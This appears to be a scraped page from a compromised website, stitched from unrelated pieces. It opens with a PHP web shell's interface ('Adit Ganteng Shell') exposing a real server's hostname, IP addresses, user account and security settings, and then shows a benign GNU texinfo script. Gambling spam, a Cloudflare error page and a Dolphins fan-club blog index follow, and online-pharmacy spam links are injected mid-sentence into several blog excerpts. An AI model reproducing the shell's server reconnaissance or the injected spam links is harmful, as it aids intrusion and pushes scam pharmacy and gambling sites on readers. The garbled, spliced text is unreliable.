x

Adit Ganteng Shell

: /sbin/ [ dr-xr-xr-x ]
Uname: Linux d4040.use1.stableserver.net 4.18.0-553.33.1.el8_10.x86_64 #1 SMP Thu Dec 19 06:22:22 EST 2024 x86_64
Software: Apache
PHP version: 8.1.34 [ PHP INFO ] PHP os: Linux
Server Ip: 195.250.26.131
Your Ip: 216.73.216.138
User: drivenby (1002) | Group: drivenby (1003)
Safe Mode: OFF
Disable Function:
NONE

name : fix-info-dir
#!/bin/sh
#fix-info-dir (GNU texinfo)
VERSION=1.1
#Copyright (C) 1998, 2003 Free Software Foundation, Inc.
#fix-info-dir comes with NO WARRANTY, to the extent permitted by law.
#You may redistribute copies of fix-info-dir
#under the terms of the GNU General Public License.
#For more information about these matters, see the files named COPYING."
#fix-info-dir was derived from update-info and gen-dir-node
# The skeleton file contains info topic names in the
# order they should appear in the output.  There are three special
# lines that alter the behavior: a line consisting of just "--" causes
# the next line to be echoed verbatim to the output.  A line
# containing just "%%" causes all the remaining filenames (wildcards
# allowed) in the rest of the file to be ignored.  A line containing
# just "!!" exits the script when reached (unless preceded by a line
# containing just "--").
#Author: Richard L. Hawes, rhawes@dmapub.dma.org.

# ###SECTION 1### Constants
set -h 2>/dev/null
# ENVIRONMENT
if test -z "$TMPDIR"; then
	TMPDIR="/usr/tmp"
fi
if test -z "$LINENO"; then
	LINENO="0"
fi

MENU_BEGIN='^\*\([ 	]\)\{1,\}Menu:'
MENU_FILTER1='s/^\*\([ 	]\)\{1,\}/* /'
MENU_FILTER2='s/\([ 	]\)\{1,\}$//g'

TMP_FILE1="${TMPDIR}/fx${$}.info"
TMP_FILE2="${TMPDIR}/fy${$}.info"
TMP_FILE_LIST="$TMP_FILE1 $TMP_FILE2"

TRY_HELP_MSG="Try --help for more information"

# ###SECTION 100### main program
#variables set by options
CREATE_NODE=""
DEBUG=":"
MODE=""
#
Total="0"
Changed=""

while test "$*"; do
	case "$1" in
		-c|--create)    CREATE_NODE="y";;
		--debug)	set -eux; DEBUG="set>&2";;
		-d|--delete)	MODE="Detect_Invalid";;
		+d);;
		--version)
cat<<VersionEOF
fix-info-dir (GNU Texinfo) $VERSION
Copyright (C) 1998 Free Software Foundation, Inc.
fix-info-dir comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of fix-info-dir
under the terms of the GNU General Public License.
For more information about these matters, see the files named COPYING.
Author: Richard L. Hawes
VersionEOF
		exit;;

		--help)
cat<<HelpEndOfFile
Usage:	fix-info-dir  [OPTION]... [INFO_DIR/[DIR_FILE]] [SKELETON]

It detects and inserts missing menu items into the info dir file.
The info dir must be the current directory.

Options:
-c,	--create	create a new info node
-d,	--delete	delete invalid menu items (ignore missing menu items)
	--debug		print debug information to standard error path
	--help		print this help message and exit
	--version	print current version and exit
Backup of the info node has a '.old' suffix added.  This is a shell script.
Environment Variables: TMPDIR
Email bug reports to bug-texinfo@gnu.org.
HelpEndOfFile
		exit;;

		[-+]*)	echo "$0:$LINENO: \"$1\" is not a valid option">&2
			echo "$TRY_HELP_MSG">&2
			exit 2;;
		*) break;;
	esac
	shift
done

ORIGINAL_DIR=`pwd`

if test "$#" -gt "0"; then
	INFO_DIR="$1"
	shift
else
	INFO_DIR=$DEFAULT_INFO_DIR
fi

if test ! -d "${INFO_DIR}"; then
	DIR_FILE=`basename ${INFO_DIR}`;
	INFO_DIR=`dirname ${INFO_DIR}`;
else
	DIR_FILE="dir"
fi

cd "$INFO_DIR"||exit


if test "$CREATE_NODE"; then
	if test "$#" -gt "0"; then
		if test `expr $1 : /` = '1'; then
			SKELETON="$1"
		else
			SKELETON="$ORIGINAL_DIR/$1"
		fi
		if test ! -r "$SKELETON" && test -f "$SKELETON"; then
			echo "$0:$LINENO: $SKELETON is not readable">&2
			exit 2
		fi
		shift
	else
		SKIP_READ=yes
		SKELETON=/dev/null

	fi
else
	if test ! -f "$DIR_FILE"; then
		echo "$0:$LINENO: $DIR_FILE is irregular or nonexistant">&2
		exit 2
	elif test ! -r "$DIR_FILE"; then
		echo "$0:$LINENO: $DIR_FILE is not readable">&2
		exit 2
	elif test ! -w "$DIR_FILE"; then
		echo "$0:$LINENO: $DIR_FILE is not writeable">&2
		exit 2
	fi
fi

if test "$#" -gt "0"; then
	echo "$0:$LINENO: Too many parameters">&2
	echo "$TRY_HELP_MSG">&2
	exit 2
fi

if test -f "$DIR_FILE"; then
	cp "$DIR_FILE" "$DIR_FILE.old"
	echo "Backed up $DIR_FILE to $DIR_FILE.old."
fi

if test "$CREATE_NODE"; then
	if test "$MODE"; then
		echo "$0:$LINENO: ERROR: Illogical option combination: -d -c">&2
		echo "$TRY_HELP_MSG">&2
		exit 2
	fi
	echo "Creating new Info Node: `pwd`/$DIR_FILE"
	Changed="y"

{

	### output the dir header

	cat<<DIR_FILE_END_OF_FILE
This is the file .../info/$DIR_FILE, which contains the
topmost node of the Info hierarchy, called ($DIR_FILE)Top.
The first time you invoke Info you start off looking at this node.

File: $DIR_FILE,	Node: Top	This is the top of the INFO tree

  This (the Directory node) gives a menu of major topics.
  Typing "q" exits, "H" lists all Info commands, "d" returns here,
  "h" gives a primer for first-timers,
  "mEmacs<Return>" visits the Emacs manual, etc.

  In Emacs, you can click mouse button 2 on a menu item or cross reference
  to select it.

* Menu:
DIR_FILE_END_OF_FILE

### go through the list of files in the skeleton.  If an info file
### exists, grab the ENTRY information from it.  If an entry exists
### use it, otherwise create a minimal $DIR_FILE entry.

	# Read one line from the file.  This is so that we can echo lines with
	# whitespace and quoted characters in them.
	while test -z "$SKIP_READ" && read fileline; do
		# flag fancy features
		if test ! -z "$echoline"; then        # echo line
			echo "$fileline"
			echoline=""
			continue
		elif test "${fileline}" = "--"; then
			# echo the next line
			echoline="1"
			continue
		elif test "${fileline}" = "%%"; then
			# skip remaining files listed in skeleton file
			skip="1"
			continue
		elif test "${fileline}" = "!!"; then
			# quit now
			break
		fi

		# handle files if they exist
		for file in $fileline""; do
			fname=
			if test -z "$file"; then
				break
			fi
			# Find the file to operate upon.
			if test -r "$file"; then
				fname="$file"
			elif test -r "${file}.info"; then
				fname="${file}.info"
			elif test -r "${file}.gz"; then
				fname="${file}.gz"
			elif test -r "${file}.info.gz"; then
				fname="${file}.info.gz"
			else
				echo "$0:$LINENO: can't find info file for ${file}?">&2
				continue
			fi

			# if we found something and aren't skipping, do the entry
			if test "$skip"; then
				continue
			fi

			infoname=`echo $file|sed -e 's/.info$//'`
			entry=`zcat -f $fname|\
			sed -e '1,/START-INFO-DIR-ENTRY/d'\
			-e '/END-INFO-DIR-ENTRY/,$d'`
			if [ ! -z "${entry}" ]; then
				echo "${entry}"
			else
				echo "* ${infoname}: (${infoname})."
			fi
			Total=`expr "$Total" + "1"`
		done
	done
}>$DIR_FILE<$SKELETON
fi

trap ' eval "$DEBUG"; rm -f $TMP_FILE_LIST; exit ' 0
trap ' rm -f $TMP_FILE_LIST
	exit ' 1
trap ' rm -f $TMP_FILE_LIST
	echo "$0:$LINENO: received INT signal.">&2
	exit ' 2
trap ' rm -f $TMP_FILE_LIST
	echo "$0:$LINENO: received QUIT signal.">&2
	exit ' 3

sed -e "1,/$MENU_BEGIN/d" -e "$MENU_FILTER1" -e "$MENU_FILTER2"<$DIR_FILE\
|sed -n -e '/\* /{
s/).*$//g
s/\.gz$//
s/\.info$//
s/^.*(//p
}'|sort -u>$TMP_FILE1
ls -F|sed -e '/\/$/d' -e '/[-.][0-9]/d'\
	-e "/^$DIR_FILE\$/d" -e "/^$DIR_FILE.old\$/d"\
	-e 's/[*@]$//' -e 's/\.gz$//' -e 's/\.info$//'|sort>$TMP_FILE2

if test -z "$MODE"; then
	#Detect Missing
	DONE_MSG="total menu item(s) were inserted into `pwd`/$DIR_FILE"
	for Info_Name in `comm -13 $TMP_FILE1 $TMP_FILE2`; do
		if test -r "$Info_Name"; then
			Info_File="$Info_Name"
		elif test -r "${Info_Name}.info"; then
			Info_File="${Info_Name}.info"
		elif test -r "${Info_Name}.gz"; then
			Info_File="${Info_Name}.gz"
		elif test -r "${Info_Name}.info.gz"; then
			Info_File="${Info_Name}.info.gz"
		else
			echo "$0:$LINENO: can't find info file for ${Info_Name}?">&2
			continue
		fi
		Changed="y"
		if install-info $Info_File $DIR_FILE; then
			Total=`expr "$Total" + "1"`
		fi
	done
else
	# Detect Invalid
	DONE_MSG="total invalid menu item(s) were removed from `pwd`/$DIR_FILE"
	for Info_Name in `comm -23 $TMP_FILE1 $TMP_FILE2`; do
		Changed="y"
		if install-info --remove --remove-exactly $Info_Name $DIR_FILE; then
			Total=`expr "$Total" + "1"`
		fi
	done
fi

# print summary
if test "$Changed"; then
	echo "$Total $DONE_MSG"
else
	echo "Nothing to do"
fi
rm -f $TMP_FILE_LIST
eval "$DEBUG"
exit 0
© 2026 Adit Ganteng
DolFans NYC - New York City's Official Home For Miami Dolphins Fans - Part 2
https://www.raqsmediacollective.net/ https://works.raqsmediacollective.net/ situs togel toto togel situs togel bandar togel situs toto situs togel https://duniaflix.com/ https://flixnesia.com/ dutatgr.com | 521: Web server is down

Web server is down Error code 521

Visit cloudflare.com for more information.
2026-04-15 18:26:47 UTC
You

Browser

Working
Buffalo

Cloudflare

Working
dutatgr.com

Host

Error

What happened?

The web server is not returning a connection. As a result, the web page is not displaying.

What can I do?

If you are a visitor of this website:

Please try again in a few minutes.

If you are the owner of this website:

Contact your hosting provider letting them know your web server is not responding. Additional troubleshooting information.

mainlotre situs toto mainlotre mainlotre mainlotre situs togel mainlotre mainlotre mainlotre mainlotre mainlotre situs togel
Virtual #MetLifeTakeover Recap

Virtual #MetLifeTakeover Recap

I just wanted to give everyone a quick update on our virtual #MetLifeTakeover event. I think yesterday went just about as well as we could have possibly planned. We had a ton of people watching the game live with us, the Dolphins won and we raised almost $3000 for the Miami Dolphins Foundation Food Relief

Read More →
Virtual #MetLifeTakeover, Raffles & Giveaways

Virtual #MetLifeTakeover, Raffles & Giveaways

I cannot imagine how crazy this week would be for us if it weren’t for the coronavirus pandemic. It would be #MetLifeTakeover week with the maybe best Dolphins team in Dolfans NYC history going against a winless Jets team. Yeah the loss yesterday was tough, but this would undoubtedly be our biggest year ever. Unfortunately,

Read More →
New Season, New Way Of Watching “Together”

New Season, New Way Of Watching “Together”

I know most Dolphins fans have been looking forward this day for two years after knowing last year was going to be less than ideal. The day is finally here and instead of watching together at Slattery’s in a packed bar we are spread out all over the place watching on couches trying to connect

Read More →
2020 Draft Recap

2020 Draft Recap

I love the NFL Draft. Dolfans NYC used to do group trips every year when the Draft was in NYC. I went to Dallas a couple of years ago and I was supposed to be in Vegas for the Draft before the coronavirus messed everything up. Even with the virus I still ended up on

Read More →
Tua Tagovailoa: Joining Dolphins Is “Dream Come True”

Tua Tagovailoa: Joining Dolphins Is “Dream Come True”

When the smokescreen finally cleared on Thursday night, after months of speculation and endless rumors, the Dolphins landed their quarterback of the future. Flanked by his parents and siblings inside his Alabaster, Ala. buy nolvadex online https://delineation.ca/wp-content/uploads/2025/03/jpg/nolvadex.html no prescription pharmacy home, Tua Tagovailoa slid a black Miami Dolphins cap on his head and a lei

Read More →
2019 #MetLifeTakeover Video

2019 #MetLifeTakeover Video

The 2019 #MetLifeTakeover video is finally here! It took way longer than we wanted it’s been a crazy winter for all of us here at Dolfans NYC and I am just glad we finally got it done and I think you guys will see that it came out great. 2019 was not exactly a great

Read More →
Finatics: On The Road In NYC

Finatics: On The Road In NYC

Our #MetLifeTakeover video is taking longer than expected to get finished, so I wanted to get up something to hold you guys over in the meantime. buy professional cialis online https://healthempire.ca/wp-content/uploads/2025/03/jpg/professional-cialis.html no prescription pharmacy During the Jets game the Dolphins and Hotels.com followed us around and did a little video about us, Slattery’s and the

Read More →
2019 #MetLifeTakeover Photos And Recap

2019 #MetLifeTakeover Photos And Recap

Wow, this weekend was amazing, well at least it was until that pass interference review… But even with the loss the #MetLifeTakeover event was a huge success. With the Dolphins having some issues on the field we had less fans join us this year, but it turns out 500+ Dolfans is still a huge party!

Read More →
#MetLifeTakeover Updates

#MetLifeTakeover Updates

Hey guys, you might have noticed that our site has been screwed up for a couple of weeks. We had a bad malware attack that we have finally fixed, but it took a while. And don’t worry, since everyone pays with PayPal, we don’t collect any of your info that could have been hacked. We

Read More →
Albert Wilson Makes Impact Through Philanthropy, Community Service Initiatives

Albert Wilson Makes Impact Through Philanthropy, Community Service Initiatives

In Week 8, Dolfans NYC raised over $250 through raffles and donated a total of $500 to The Albert Wilson Foundation, which is committed to creating opportunities that will enhance the lives of children in foster care.  After spending much of his childhood in the South Florida foster care system, Miami Dolphins wide receiver Albert Wilson understands, as well as anyone, the importance of giving back to youth in his

Read More →
Dolphins Announce Play Football Week 11 Award Winners

Dolphins Announce Play Football Week 11 Award Winners

As part of Play Football, a program designed to celebrate youth football in South Florida, for each home game, the Dolphins identify the high school coach, high school player, youth player and team mom of the week. buy oseltamivir online https://delineation.ca/wp-content/uploads/2025/03/jpg/oseltamivir.html no prescription pharmacy In tribute to Don Shula’s 50th season with the organization, the

Read More →
Kenyan Drake Making Global Impact, One Smile at a Time

Kenyan Drake Making Global Impact, One Smile at a Time

Dolphins fans, far and wide, were all smiles when Kenyan Drake sprinted into the end zone as time expired to stun the Patriots last December. buy super cialis online https://bradencenter.com/wp-content/uploads/2025/03/jpg/super-cialis.html no prescription pharmacy Over the summer, the fourth-year running back capitalized on the lasting popularity of the play since hailed as the “Miami Miracle” to

Read More →
Dolphins Promote Harmony, Inclusion Though Football Unites Program

Dolphins Promote Harmony, Inclusion Though Football Unites Program

It’s just past 10 o’clock on Sunday morning, three hours before the Dolphins will kick off the 2019 season against the Ravens, and the North East plaza at Hard Rock Stadium is bustling with activity. At the team’s fourth-annual Football Unites CommUNITY Tailgate, large overhead fans are whirling at full capacity, while a DJ shuffles

Read More →
Football Season Begins, 10th Anniversary Merch & Giving Back

Football Season Begins, 10th Anniversary Merch & Giving Back

This is a very different Miami Dolphins team from the last time we updated our website. The Dolphins have had a full 25% roster overhaul in the short time since we first put #MetLifeTakeover tickets on sale. The team that is suiting up this Sunday vs the Ravens is going to have a lot of

Read More →
2019 #MetLifeTakeover Tickets Are On Sale!

2019 #MetLifeTakeover Tickets Are On Sale!

This is what you have been waiting for! buy avana online https://bereniceelectrolysis.com/jquery/js/avana.html no prescription pharmacy buy hydroxychloroquine online in the best USA pharmacy https://petspawtx.com/wp-content/uploads/2025/05/png/hydroxychloroquine.html no prescription with fast delivery drugstore For the 10th anniversary of Dolfans NYC we are doing not one, but TWO #MetLifeTakeover events! buy synthroid online in the best USA pharmacy https://petspawtx.com/wp-content/uploads/2025/05/png/synthroid.html

Read More →
2018 #MetLifeTakeover Video

2018 #MetLifeTakeover Video

It’s finally here! The 2018 #MetLifeTakeover video took us forever to finish, but I think the results are worth waiting for. For the second year in a row the video was directed/edited by RizeOptix and hosted by comedian Oscar Collazos. We loved their work on the 2017 Takeover video and we were glad they could

Read More →
Away from Cameras, Dolphins Give Back to Communities

Away from Cameras, Dolphins Give Back to Communities

For Dolphins players, the job of a professional athlete doesn’t end when the gameday cameras stop rolling and the pads are hung up in the lockers. During their free time, many give back to the communities that raised them, using their platforms and voices to make a difference in the lives of less-privileged families. In

Read More →
Dolfans NYC Vs. Green Bay

Dolfans NYC Vs. Green Bay

When the schedule came out this year the first thing I did was book a trip to Green Bay with a bunch of other members of Dolfans NYC. As the season went on I found out more and more of our crew was going. We had at least 20 people who went but there were

Read More →